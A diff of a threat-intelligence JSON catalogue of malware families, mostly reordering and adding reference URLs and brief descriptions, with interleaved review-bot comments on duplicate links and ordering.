"https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html", + "https://www.inde.nz/blog/inside-agenttesla", + "https://www.secureworks.com/research/darktortilla-malware-analysis", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://youtu.be/hxaeWyK8gMI", + "https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/", + "https://blog.malwarebytes.com/cybercrime/2020/04/new-agenttesla-variant-steals-wifi-credentials/", + "https://forensicitguy.github.io/agenttesla-vba-certutil-download/", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://forensicitguy.github.io/a-tale-of-two-dropper-scripts/", + "https://community.riskiq.com/article/40000d46", + "https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla", + "https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/", + "https://blogs.juniper.net/en-us/security/aggah-malware-campaign-expands-to-zendesk-and-github-to-host-its-malware", + "https://team-cymru.com/blog/2022/07/12/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor", + "https://blog.malwarelab.pl/posts/basfu_aggah/", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://news.sophos.com/en-us/2021/02/02/agent-tesla-amps-up-information-stealing-attacks/", + "https://malwarebookreports.com/agent-teslaggah/", + "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", + "https://malgamy.github.io/malware-analysis/Deep-Analysis-Agent-Tesla/", + "https://www.bleepingcomputer.com/news/security/russia-ukraine-war-exploited-as-lure-for-malware-distribution/", + "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware", + 
"https://www.logpoint.com/en/blog/agentteslas-capabilities-review-detection-strategies/", + "https://www.telsy.com/wp-content/uploads/ATR_82599-1.pdf", + "https://mp.weixin.qq.com/s/X0kAIHOSldiFDthb4IsmbQ", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", + "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/", + "https://malwr-analysis.com/2020/04/05/trojan-agent-tesla-malware-analysis/", + "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html", + "https://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant", + "https://unit42.paloaltonetworks.com/malicious-compiled-html-help-file-agent-tesla/", + "https://isc.sans.edu/diary/Infostealer+Malware+with+Double+Extension/29354", + "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", + "https://isc.sans.edu/diary/rss/27092", + "https://community.riskiq.com/article/6337984e", + "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", + "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry", + "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/", + "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", + "https://research.openanalysis.net/dotnet/xorstringsnet/agenttesla/2023/04/16/xorstringsnet.html", + "https://blog.netlab.360.com/purecrypter", + "https://www.netskope.com/blog/infected-powerpoint-files-using-cloud-services-to-deliver-multiple-malware", + "https://isc.sans.edu/diary/rss/28190", + "https://www.seqrite.com/blog/gorgon-apt-targeting-msme-sector-in-india/", + 
"https://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/", + "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", + "https://asec.ahnlab.com/ko/29133/", + "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/", + "https://blog.malwarebytes.com/threat-intelligence/2022/05/nigerian-tesla-419-scammer-gone-malware-distributor-unmasked/", + "https://www.lac.co.jp/lacwatch/report/20220307_002893.html", + "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-many-roads-leading-to-agent-tesla/", + "http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/", + "https://blogs.blackberry.com/en/2021/06/threat-thursday-agent-tesla-infostealer-malware", + "https://unit42.paloaltonetworks.com/excel-add-ins-malicious-xll-files-agent-tesla/" ], "synonyms": [ "AgenTesla", 
@@ -12442,22 +13010,27 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.akira",
- "https://news.sophos.com/en-us/2023/05/09/akira-ransomware-is-bringin-88-back/"
+ "https://news.sophos.com/en-us/2023/05/09/akira-ransomware-is-bringin-88-back/",
+ "https://stairwell.com/resources/akira-pulling-on-the-chains-of-ransomware/",
+ "https://cybercx.com.au/blog/akira-ransomware/",
+ "https://arcticwolf.com/resources/blog/conti-and-akira-chained-together/",
+ "https://decoded.avast.io/threatresearch/decrypted-akira-ransomware/",
+ "https://twitter.com/MalGamy12/status/1651972583615602694"
 ],
 "synonyms": [],
 "type": []
 },
 "uuid": "834635f7-fb0f-472c-913e-fb112ae29fdc",
- "value": "Akira"
+ "value": "Akira (Windows)"
 },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.albaniiutas",
- "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia",
 "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
 "https://insight-jp.nttsecurity.com/post/102gkfp/pandas-new-arsenal-part-2-albaniiutas",
+ "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia",
 "https://blog.group-ib.com/task"
 ],
 "synonyms": [
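Review bot: The Albaniiutas `refs` in this hunk end up carrying the same Avast article twice, once with and once without the trailing slash (`https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia` and the `.../east-asia/` form), so the generator should normalise trailing slashes before de-duplicating rather than re-adding the bare form. The same pattern of refs that merely changed position makes up most of the Alice ATM, Alina POS, AllaKore, Alureon, Amadey, Amtsol, Anatova and Anchor hunks below; emitting `refs` in a sorted or upstream-stable order would turn these regenerations into small, reviewable diffs. Renaming the Akira `value` to `"Akira (Windows)"` while keeping uuid `834635f7-fb0f-472c-913e-fb112ae29fdc` preserves existing correlations, but consumers that match on `value` rather than `uuid` will see a new cluster, which the commit message could call out.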
@@ -12469,7 +13042,7 @@
 "value": "Albaniiutas"
 },
 {
- "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.",
+ "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. 
Variants can steal information, gathering the infected machine\u2019s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot",
@@ -12499,10 +13072,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm",
+ "https://www.symantec.com/security-center/writeup/2016-122104-0203-99",
 "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf",
- "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html",
 "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/",
- "https://www.symantec.com/security-center/writeup/2016-122104-0203-99"
+ "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html"
 ],
 "synonyms": [
 "AliceATM",
@@ -12518,14 +13091,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.alina_pos",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-1/",
- "http://www.xylibox.com/2013/02/alina-34-pos-malware.html",
- "https://blog.centurylink.com/alina-point-of-sale-malware-still-lurking-in-dns/",
 "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Casting-a-Shadow-on-POS/",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-1/",
 "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-2/",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/"
+ "https://blog.centurylink.com/alina-point-of-sale-malware-still-lurking-in-dns/",
+ "http://www.xylibox.com/2013/02/alina-34-pos-malware.html"
 ],
 "synonyms": [
 "alina_eagle",
@@ -12542,17 +13115,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.allakore",
- "https://sebdraven.medium.com/copy-cat-of-apt-sidewinder-1893059ca68d",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf",
- "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf",
+ "https://blog.talosintelligence.com/2021/07/sidecopy.html",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt",
+ "https://www.team-cymru.com/post/allakore-d-the-sidecopy-train",
 "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
 "https://twitter.com/_re_fox/status/1212070711206064131",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479",
+ "https://sebdraven.medium.com/copy-cat-of-apt-sidewinder-1893059ca68d",
+ "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf",
 "https://github.com/Anderson-D/AllaKore",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388",
- "https://www.team-cymru.com/post/allakore-d-the-sidecopy-train",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt",
- "https://blog.talosintelligence.com/2021/07/sidecopy.html",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479"
+ 
"https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -12581,8 +13154,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.allcomeclipper",
- "https://www.gdatasoftware.com/blog/2022/02/37239-allcome-clipbanker-is-a-newcomer-in-malware-underground-forums",
- "https://bazaar.abuse.ch/browse/signature/AllcomeClipper/"
+ "https://bazaar.abuse.ch/browse/signature/AllcomeClipper/",
+ "https://www.gdatasoftware.com/blog/2022/02/37239-allcome-clipbanker-is-a-newcomer-in-malware-underground-forums"
 ],
 "synonyms": [],
 "type": []
@@ -12656,7 +13229,7 @@
 "value": "ALPC Local PrivEsc"
 },
 {
- "description": "The Alphabet ransomware is a new screenlocker that is currently being developed by a criminal developer. As the malware is not ready it does not affect any user files.\r\n\r\nThe virus includes a screenlocking function which locks the user’s screen and prohibits any interaction with the computer.",
+ "description": "The Alphabet ransomware is a new screenlocker that is currently being developed by a criminal developer. As the malware is not ready it does not affect any user files.\r\n\r\nThe virus includes a screenlocking function which locks the user\u2019s screen and prohibits any interaction with the computer.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware",
@@ -12697,9 +13270,23 @@
 },
 {
 "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphaseed",
+ "https://medium.com/s2wblog/detailed-analysis-of-alphaseed-a-new-version-of-kimsukys-appleseed-written-in-golang-2c885cce352a"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "966c5a6d-16b8-43b1-acbd-163e904d4a03",
+ "value": "AlphaSeed"
+ },
+ {
+ "description": "Alreay is a remote access trojan that uses HTTP(S) or TCP for communication with its C&C server.\r\n\r\nIt uses either RC4 or DES for encryption of its configuration, which is stored in the registry.\r\n\r\nIt sends detailed information about the victim's environment, like computer name, Windows version, \r\nsystem locale, and network configuration.\r\n\r\nIt supports almost 25 commands that include operations on the victim\u2019s filesystem, basic process management, file exfiltration, command line execution, and process injection of an executable downloaded from the attacker\u2019s C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers, starting with values like 0x21A8B293, 0x23FAE29C or 0x91B93485.\r\n\r\nIt comes either as an EXE or as a DLL with the internal DLL name t_client_dll.dll. It may contain statically linked code from open-source libraries like Mbed TLS or zLib (version 1.0.1).\r\n\r\nAlreay RAT was observed in 2016-2017, running on networks of banks operating SWIFT Alliance software.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay",
+ "https://securelist.com/lazarus-under-the-hood/77908/",
 "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/"
 ],
 "synonyms": [],
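Review bot: The new AlphaSeed entry lands with `"description": ""`, the same empty placeholder the Alreay entry just outgrew, even though the single S2W reference in its refs describes it (per the URL slug) as a new version of Kimsuky's AppleSeed written in Golang; a one-line summary along those lines, confirmed against the article, would make the cluster usable on its own. Alreay's refs now list what looks like the same Securelist report under two URLs (`https://securelist.com/lazarus-under-the-hood/77908/` and `https://securelist.com/blog/sas/77908/lazarus-under-the-hood/`), presumably the old path and its current one, so one of them should be dropped. The added Alreay description also carries a stray `\r\n` in the middle of a sentence (`Windows version, \r\nsystem locale`), apparently inherited from upstream text; it is harmless to parsers but renders as a broken line wherever the description is shown.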
@@ -12714,13 +13301,14 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon",
 "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html",
- "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html",
+ "https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/",
+ "http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html",
+ "https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/",
+ "https://www.youtube.com/watch?v=FttiysUZmDw",
 "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj64_wowlik.vt",
 "https://archive.f-secure.com/weblog/archives/The_Case_of__TDL3.pdf",
- "https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/",
- "http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html",
- "https://www.youtube.com/watch?v=FttiysUZmDw",
- "https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/"
+ "https://twitter.com/Sebdraven/status/1496878431719473155",
+ "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html"
 ],
 "synonyms": [
 "Olmarik",
@@ -12739,38 +13327,44 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey",
- "https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer",
- "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
- "https://isc.sans.edu/diary/27264",
- "https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become",
- "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
- "https://asec.ahnlab.com/en/41450/",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
- "https://twitter.com/0xffff0800/status/1062948406266642432",
- "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore",
- "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
 "https://www.anquanke.com/post/id/230116",
+ "https://asec.ahnlab.com/en/44504/",
+ "https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become",
+ "https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Amadey/amadey_string_decryptor.py",
+ "https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/",
+ "https://medium.com/walmartglobaltech/amadey-stealer-plugin-adds-mikrotik-and-outlook-harvesting-518efe724ce4",
+ "https://asec.ahnlab.com/en/36634/",
+ "https://nao-sec.org/2019/04/Analyzing-amadey.html",
+ "https://embee-research.ghost.io/amadey-bot-infrastructure/",
 "https://embee-research.ghost.io/redline-stealer-basic-static-analysis-and-c2-extraction/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html",
 "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- 
"https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
 "https://thecyberexpress.com/amadey-botnet-back-via-phishing-sites/",
+ "https://asec.ahnlab.com/en/41450/",
+ "https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/",
+ "https://twitter.com/0xffff0800/status/1062948406266642432",
+ "https://blog.cyble.com/2023/01/25/the-rise-of-amadey-bot-a-growing-concern-for-internet-security/",
+ "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
+ "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-strings-in-amadey-1-09/",
+ "https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer",
+ "https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/",
+ "https://www.splunk.com/en_us/blog/security/amadey-threat-analysis-and-detections.html",
+ "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
+ "https://isc.sans.edu/diary/27264",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
+ "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore",
+ "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
+ "https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Amadey/amadey_config_extractor.ipynb",
+ 
"https://embee-research.ghost.io/shodan-censys-queries/",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
+ "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
 "https://twitter.com/ViriBack/status/1062405363457118210",
 "https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot",
- "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-strings-in-amadey-1-09/",
- "https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://medium.com/walmartglobaltech/amadey-stealer-plugin-adds-mikrotik-and-outlook-harvesting-518efe724ce4",
- "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
- "https://nao-sec.org/2019/04/Analyzing-amadey.html",
- "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://asec.ahnlab.com/en/36634/",
- "https://blog.cyble.com/2023/01/25/the-rise-of-amadey-bot-a-growing-concern-for-internet-security/",
- "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
- "https://asec.ahnlab.com/en/44504/"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -12783,8 +13377,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol",
- "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/",
- "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf"
+ "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf",
+ "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/"
 ],
 "synonyms": [
 "Adupihan"
@@ -12799,8 +13393,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/",
- "https://www.bleepingcomputer.com/news/security/new-anatova-ransomware-supports-modules-for-extra-functionality/"
+ "https://www.bleepingcomputer.com/news/security/new-anatova-ransomware-supports-modules-for-extra-functionality/",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/"
 ],
 "synonyms": [],
 "type": []
@@ -12813,26 +13407,26 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchor", - "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", - "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html", - "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html", - "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/", - "https://isc.sans.edu/diary/27308", - "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/", - "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", - "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth", "https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607", - "https://unit42.paloaltonetworks.com/ryuk-ransomware/", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", - "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", - "https://hello.global.ntt/zh-cn/insights/blog/trickbot-variant-communicating-over-dns", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.kryptoslogic.com/blog/2021/07/adjusting-the-anchor/", - "https://www.netscout.com/blog/asert/dropping-anchor", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://labs.sentinelone.com/the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/", 
"https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns", - "https://labs.sentinelone.com/the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/" + "https://hello.global.ntt/zh-cn/insights/blog/trickbot-variant-communicating-over-dns", + "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html", + "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", + "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/", + "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", + "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/", + "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth", + "https://isc.sans.edu/diary/27308", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.netscout.com/blog/asert/dropping-anchor", + "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html", + "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "https://unit42.paloaltonetworks.com/ryuk-ransomware/" ], "synonyms": [], "type": [] 
@@ -12845,10 +13439,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchormail", + "https://cyware.com/news/trickbots-anchordns-is-now-upgraded-to-anchormail-a21f5490/", "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine", "https://securityintelligence.com/posts/new-malware-trickbot-anchordns-backdoor-upgrades-anchormail/", - "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/", - "https://cyware.com/news/trickbots-anchordns-is-now-upgraded-to-anchormail-a21f5490/" + "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/" ], "synonyms": [], "type": [] @@ -12856,11 +13450,28 @@ "uuid": "7792096a-7623-43a1-9a67-28dce0e4b39e", "value": "AnchorMail" }, + { + "description": "Recon/Loader malware attributed to Lazarus, disguised as Notepad++ shell extension.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchormtea", + "http://report.threatbook.cn/LS.pdf", + "https://cybergeeks.tech/a-detailed-analysis-of-lazarus-malware-disguised-as-notepad-shell-extension/", + "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "565de3f5-7eb7-43ca-a9d9-b588dfd6a50a", + "value": "AnchorMTea" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.andardoor", + "https://asec.ahnlab.com/en/56405/", + "https://asec.ahnlab.com/ko/56256/", "https://asec.ahnlab.com/ko/47751/" ], "synonyms": [], 
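Review bot: The new AnchorMTea entry's references include `http://report.threatbook.cn/LS.pdf`, a plain-HTTP link to a PDF, while every other source in the same list is `https://`. Analysts who fetch reports from these refs get no transport integrity on that one; if the host serves it over TLS the link should read `https://report.threatbook.cn/LS.pdf`. The `cocomelonc.github.io/tutorial/.../simple-malware-av-evasion-2.html` link appears from its URL to be a generic AV-evasion tutorial rather than an analysis of this family, which is worth knowing when reading the list as support for the Lazarus attribution stated in the description.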
